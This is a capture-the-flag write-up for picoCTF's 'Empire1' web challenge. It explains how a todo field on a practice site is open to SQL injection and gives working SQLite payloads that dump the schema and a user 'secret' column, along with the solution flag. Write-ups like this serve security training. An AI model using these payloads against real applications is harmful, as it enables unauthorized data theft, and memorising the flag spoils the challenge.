Empire1
Point: 400
Category
Web Exploitation
Question
Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/37779/ (link) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:37779
Hint
Pay attention to the feedback you get
There is very limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.
The database gets reverted every 2 hours if you do break it, just come back later
Solution
After registered and signed in, we've seen a nav bar with Add a Todo
, Your Todos
, Employee Listing
. It doesn't seem to contain any vulnerability.
Trying to add something to TODO
, we've got this
We've seen The "Very Urgent:" prefix is automatically prepended to any text provided by the user.
After trying different strategies, I found that the page is vulnerable to SQL injection using the following syntax: '||(SQL)||'
The first time, I've tried with ' || (SELECT group_concat(sql) FROM sqlite_master) || '
, then we got this
I saw secret VARCHAR(128)
, then I tried ' || (SELECT group_concat(secret) FROM user) || '
. BOOM!, go to Your Todos
tab, we got the flag Very Urgent: Likes Oreos.,Know it all.,picoCTF{wh00t_it_a_sql_injecta4dfbd62}
Flag
picoCTF{wh00t_it_a_sql_injecta4dfbd62}
Last updated